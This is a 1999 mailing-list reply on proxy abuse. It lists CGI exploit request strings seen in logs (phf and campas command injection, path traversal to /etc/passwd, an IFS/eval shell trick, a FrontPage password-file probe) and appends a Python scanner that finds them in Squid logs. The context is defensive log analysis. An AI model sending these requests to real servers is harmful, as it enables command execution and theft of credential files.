Re: proxying exploit attempts

From: Andrew Daviel <andrew@dont-contact.us>
Date: Fri, 5 Feb 1999 17:10:53 -0800 (PST)

On Sat, 23 Jan 1999, James Young wrote:

> At 04:45 PM 1/23/99 +1000, mlowe@dataline.net.au wrote:
> >Are there any known exploits for squid? If so where is the list/site
> located?

I thought I'd mailed this list, but can't find my post. Maybe I didn't.

I have seen the following CGI exploits, many times:

 /cgi-bin/phf?Qname=me%0als%20-lFa
 /cgi-bin/faxsurvey?ls%20-lFa
 /cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
 /cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
 /cgi-bin/php.cgi?/etc/passwd
 /cgi-bin/view-source?../../../../../../../../etc/passwd
 /cgi-bin/htmlscript?../../../../../../../../etc/passwd
 /cgi-bin/campas?%0als%20-lFa%20/etc
 /cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
 /cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
 /cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc
 /cgi-bin/pfdispaly.cgi?'%0Als%20-lFa%20/etc
 /_vti_pvt/service.pwd

If the origin server traps these but not x-forwarded-for, it looks like
your Squid machine is the abuser.

PHF was distributed with early Apache and NCSA httpd as a demo CGI script.
Webdist I think is an Irix software update tool. Not sure about the
others; they must be fairly common. _vti_pvt I presume is from NT.

One might consider searching for these when doing log rotation, and
preserving the trail for a bit longer than 36 hours or whatever people
use...

regards

Deniable unless digitally signed
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
http://andrew.triumf.ca/andrew
Received on Fri Feb 05 1999 - 17:49:52 MST
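
An added example, not part of the original post: one way to do the search suggested above at log-rotation time, assuming Squid's native access.log format (time, elapsed, client, code/status, bytes, method, URL, ...). It reports which client behind the proxy requested each listed script, which is the information the origin server lacks when it does not record X-Forwarded-For. The function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path prefixes copied from the list in the post above.
PROBED = (
    "/cgi-bin/phf", "/cgi-bin/faxsurvey", "/cgi-bin/handler",
    "/cgi-bin/webdist.cgi", "/cgi-bin/php.cgi", "/cgi-bin/view-source",
    "/cgi-bin/htmlscript", "/cgi-bin/campas", "/cgi-bin/info2www",
    "/cgi-bin/aglimpse", "/cgi-bin/pfdisplay.cgi", "/cgi-bin/pfdispaly.cgi",
    "/_vti_pvt/service.pwd",
)
SCHEME_HOST = re.compile(r"^[a-z][a-z0-9+.-]*://[^/]*", re.I)

# Constructed sample lines in Squid native log format (not real traffic).
SAMPLE = """\
917658653.101    245 10.0.0.5 TCP_MISS/404 512 GET http://www.example.com/cgi-bin/phf?Qname=me%0als%20-lFa - DIRECT/192.0.2.10 text/html
917658654.220    130 10.0.0.5 TCP_MISS/404 498 GET http://www.example.com/cgi-bin/php.cgi?/etc/passwd - DIRECT/192.0.2.10 text/html
917658700.010     90 10.0.0.9 TCP_HIT/200 2048 GET http://www.example.com/index.html - NONE/- text/html
917658800.500    310 10.0.0.7 TCP_MISS/404 470 GET http://www.example.org/%5Fvti%5Fpvt/service.pwd - DIRECT/192.0.2.20 text/html
917658801.500    110 10.0.0.9 TCP_MISS/200 900 GET http://www.example.org/cgi-bin/phfoo - DIRECT/192.0.2.20 text/html
""".splitlines()

def probed_script(url):
    """Return the listed script prefix a URL targets, or None."""
    path = unquote(SCHEME_HOST.sub("", url).split("?", 1)[0]).lower()
    for p in PROBED:
        # Require a boundary after the prefix so /cgi-bin/phfoo is not a hit.
        if path.startswith(p) and not path[len(p):len(p) + 1].isalnum():
            return p
    return None

def scan(lines):
    """Return (raw lines worth preserving, scripts probed per client address)."""
    hits, by_client = [], defaultdict(set)
    for line in lines:
        f = line.split()
        if len(f) < 7:
            continue  # not a native-format access.log entry
        script = probed_script(f[6])
        if script:
            hits.append(line)
            by_client[f[2]].add(script)
    return hits, dict(by_client)

if __name__ == "__main__":
    hits, by_client = scan(SAMPLE)
    for client, scripts in sorted(by_client.items()):
        print(client, sorted(scripts))
    print(len(hits), "lines to keep past normal rotation")
```

Writing the returned lines to a separate file before the rotated log is deleted keeps the trail for as long as that file is retained.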
